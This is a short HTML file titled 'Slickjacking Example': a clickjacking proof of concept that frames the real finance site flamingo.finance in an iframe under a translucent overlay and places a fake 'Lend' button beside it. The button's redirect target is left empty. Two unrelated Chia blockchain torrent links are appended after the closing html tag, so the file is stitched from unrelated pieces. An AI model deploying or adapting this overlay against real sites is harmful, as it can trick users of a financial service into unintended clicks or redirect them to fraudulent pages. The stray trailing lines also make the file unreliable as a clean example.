<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Slickjacking Example</title>
<style>
    body {
        margin: 0;
        padding: 0;
    }
    #overlay {
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background-color: rgba(0, 0, 0, 0.1); /* 50% opacity */
        z-index: 9999;
    }
    #iframe-container {
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
    }
    #redirect-btn {
        position: fixed;
        top: 50%;
        left: calc(50% + 420px);
        transform: translate(-50%, -50%);
        padding: 15px 25px;
        background-color: #007bff;
        color: white;
        border: none;
        border-radius: 15px;
        cursor: pointer;
        z-index: 10000;
    }
</style>
</head>
<body>

<div id="overlay">
    <div id="iframe-container">
        <iframe src="https://flamingo.finance" width="1200" height="600" frameborder="0"></iframe>
    </div>
</div>

<button id="redirect-btn">Lend</button>

<script>
    document.getElementById("redirect-btn").addEventListener("click", function() {
        window.location.href = "";
    });
</script>

</body>
</html>
//https://torrents.chia.net/databases/mainnet/blockchain_v2_mainnet.2023-03-04.sqlite.gz.torrent
//https://torrents.chia.net/databases/mainnet/mainnet.2023-12-20.tar.gz.torrent


